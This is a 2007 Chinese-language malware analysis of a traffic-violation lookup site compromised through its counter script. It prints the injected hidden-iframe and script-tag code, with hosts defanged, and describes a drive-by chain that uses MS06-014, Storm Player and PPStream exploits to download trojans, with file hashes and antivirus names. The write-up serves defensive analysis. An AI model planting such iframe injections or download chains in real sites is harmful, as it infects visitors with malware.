某交通违法查询网页被挂马Virus.Win32.AutoRun.xu等
endurer 原创
2007-10-26 第1版
问题出在该网页所用的计数器代码上:
/---
<script src="hxxp://www.h*c**jj***d.com/wfcx/count/online.asp"></script>
---/
看看hxxp://www.h*c**jj***d.com/wfcx/count/online.asp 的代码:
/---
<iframe src=hxxp://user*.free.77**16*9.net/%73%61%74%61%6E%6C%73%78/sa.htm width=100 height=0></iframe><iframe src="hxxp://web**.*59***cn.cn/siyua/index.htm" width=100 height=0></iframe><iframe src="hxxp://web**.*59***cn.cn/siyua/index.htm" width=100 height=0></iframe><iframe src="hxxp://web**.*59***cn.cn/siyua/index.htm" width=100 height=0></iframe><iframe src="hxxp://web**.*59***cn.cn/bzsiyu/index.htm" width=100 height=0></iframe><iframe src="hxxp://web**.*59***cn.cn/bzsiyu/index.htm" width=100 height=0></iframe><iframe src="hxxp://hack**t*ao.q**yun.net/" width=100 height=0></iframe>
<iframe src=hxxp://w**.7***373*4.cn/reg.htm?a width=100 height=0 frameborder=0></iframe><iframe src="hxxp://c*.th*e**c.cn/hacktao/" width=100 height=0></iframe>
<iframe src="hxxp://M**.thIe**c.cn/siyua/" width=100 height=0></iframe>
<iframe src="hxxp://M**.thIe**c.cn/siyua/" width=0 height=0></iframe>
<iframe src="hxxp://b**zsiyua*.5***12j.com/" width=0 height=0></iframe>
<iframe src="hxxp://**siyua*.host**1.8**ma*k.com/" width=0 height=0></iframe>
<iframe src="hxxp://**siyua*.host**1.8**ma*k.com/1.htm" width=0 height=0></iframe><iframe src="hxxp://**siyua*.host**1.8**ma*k.com/" width=0 height=0></iframe>
<iframe src="hxxp://**siyua*.host**1.8**ma*k.com/" width=0 height=0></iframe>
<iframe src=hxxp://www.m**8*585**3.com.cn/index.htm width=0 height=0></iframe>
<iframe src=hxxp://www.m**8*585**3.cn/muma/index.htm width=0 height=0></iframe>
<iframe src=hxxp://www.n*8*585**3.cn/index.htm width=0 height=0></iframe>
<iframe src=hxxp://www.m**8*585**3.cn/gogo/index.htm width=0 height=0></iframe><iframe src=hxxp://www.m**8*585**3.com.cn/index.htm width=0 height=0></iframe>
<iframe src=hxxp://www.m**8*585**3.cn/muma/index.htm width=0 height=0></iframe>
<iframe src=hxxp://www.n*8*585**3.cn/index.htm width=0 height=0></iframe>
<iframe src=hxxp://www.m**8*585**3.cn/gogo/index.htm width=0 height=0></iframe><iframe width=0 height=0></iframe><iframe width=0 height=0></iframe><iframe src="hxxp://**siyua*.host**1.8**ma*k.com/" width=0 height=0></iframe>
<iframe src=hxxp://w**.m**h*88***88.cn/ad.htm?a width=100 height=0 frameborder=0></iframe>
<iframe src=hxxp://w**.7***373*4.cn/reg.htm?a width=100 height=0 frameborder=0></iframe><iframe src="hxxp://**siyua*.host**1.8**ma*k.com/" width=0 height=0></iframe>
<iframe src="hxxp://**siyua*.host**1.8**ma*k.com/" width=0 height=0></iframe>
<iframe src="hxxp://**siyua*.host**1.8**ma*k.com/" width=0 height=0></iframe>
<iframe height=0 width=0></iframe><iframe src="hxxp://**siyua*.host**1.8**ma*k.com/" width=0 height=0></iframe>
<iframe src=hxxp://www.8***8o*u.cn/index.htm height=0 width=0></iframe><iframe src=hxxp://www.8***8o*u.cn/index.htm height=0 width=0></iframe><iframe src="hxxp://**siyua*.host**1.8**ma*k.com/" width=0 height=0></iframe>
<iframe src=hxxp://www.m**ht*engl*ong.com/mm.htm height=0 width=0></iframe><iframe src=hxxp://www.m**ht*engl*ong.com/mm.htm height=0 width=0></iframe><iframe src=hxxp://www.m**ht*engl*ong.com/mm.htm height=0 width=0></iframe><iframe src="hxxp://**siyua*.host**1.8**ma*k.com/" width=0 height=0></iframe>
<iframe src="hxxp://userI.free**2.7**716*9.net/siyua/" width=0 height=0></iframe><iframe src=hxxp://www.8***8o*u.cn/ip/1.htm height=0 width=0></iframe><iframe src=hxxp://www.8***8o*u.cn/ip/1.htm height=0 width=0></iframe><iframe src="hxxp://**siyua*.host**1.8**ma*k.com/" width=0 height=0></iframe>
<iframe src="hxxp://userI.free**2.7**716*9.net/siyua/" width=0 height=0></iframe><iframe src=hxxp://www.8***8o*u.cn/ip/1.htm height=0 width=0></iframe>
document.write("<a href=hxxp://www.h*c**jj***d.com/wfcx/count/ShowOnline.asp title=查看当前在线人数列表><font color=red>当前在线<strong>1</strong>人</font></a>")
---/
挂的东东还真多~
随便找了 hxxp://w**.7***373*4.cn/reg.htm?a 来分析。代码为:
/---
<iframe src=dog.htm width=1 height=0></iframe>
<script src=haha.js></script>
<script src='hxxp://s*89.cnzz.com/stat.php?id=5*372*23&web_id=5*372*23&show=pic2' language='JavaScript' charset='gb2312'></script>
---/
hxxp://w**.7***373*4.cn/dog.htm 的内容为:
/---
<iframe src=hxxp://a*a.1***8d*d.net/ww/new04.htm?xinjiang width=0 height=0></iframe
---/
hxxp://a*a.1***8d*d.net/ww/new04.htm?xinjiang 的内容为:
/---
<iframe width='0' height='0' src='hxxp://a*a.1***8d*d.net/aa/kl.htm'></iframe>
<script language="javascript" type="text/javascript" src="hxxp://js.users.51.la/12**996*44.js"></script>
---/
hxxp://a*a.1***8d*d.net/aa/kl.htm 的内容为加密的JavaScript代码,经2次解密,得到原始代码,功能是若不存在Cookies变量OK,则创建,并引入漏洞利用代码:
/---
<script src=hxxp:a*a.1***8d*d.net//aa//1.js><//script>
<script src=hxxp:a*a.1***8d*d.net//aa//b.js><//script><script src=hxxp:a*a.1***8d*d.net//aa//pps.js><//script>
---/
并下载 hxxp://down**.1***8d*dI*.net/bb/bd.cab
hxxp://a*a.1***8d*d.net/aa/1.js 功能是利用 MS06014漏洞下载hxxp://down**.1***8d*dI*.net/bb/014.exe,保存为ntuser.com,利用cmd.exe来运行。
文件说明符 : D:/test/014.exe
属性 : A---获取文件版本信息大小失败!
创建时间 : 2007-10-26 13:48:14
修改时间 : 2007-10-26 13:48:14
访问时间 : 2007-10-26 13:14:48
大小 : 37888 字节 37.0 KB
MD5 : 6d84039e781655f16185023a7a7c09e1
SHA1: 3FD12BE3D86DF261438BBED126C507D1E14A90E0
CRC32: 597058c5
Scanned file: 014.exe - Infected |
014.exe - infected by Virus.Win32.AutoRun.xu |
hxxp://a*a.1***8d*d.net/aa/b.js 利用了暴风影音MPS.DLL ActiveX控件多个远程溢出漏洞(参考:hxxp://www.nsfocus.net/vulndb/10900)
hxxp://a*a.1***8d*d.net/aa/pps.js 利用了ppstream的漏洞
hxxp://down**.1***8d*dI*.net/bb/bd.cab 包含 内容与 014.exe 相同的文件 bd.exe
hxxp://w**.7***373*4.cn/haha.js 利用MS06014漏洞下载hxxp://www.m***ir*7***21.com/mir721.exe
文件说明符 : D:/test/mir721.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-10-26 13:36:26
修改时间 : 2007-10-26 13:36:27
访问时间 : 2007-10-26 13:38:37
大小 : 28376 字节 27.728 KBMD5 : cfc4727cb3e255a15a3da2cdad8e60eb
SHA1: BCC8B3E76852BF6FC0D5661D93868E1F78DC2C38
CRC32: 41011c50
瑞星报为:Win32.SEG.bc
Scanned file: mir721.exe - Infected |
mir721.exe - infected by Trojan.Win32.Agent.bwt |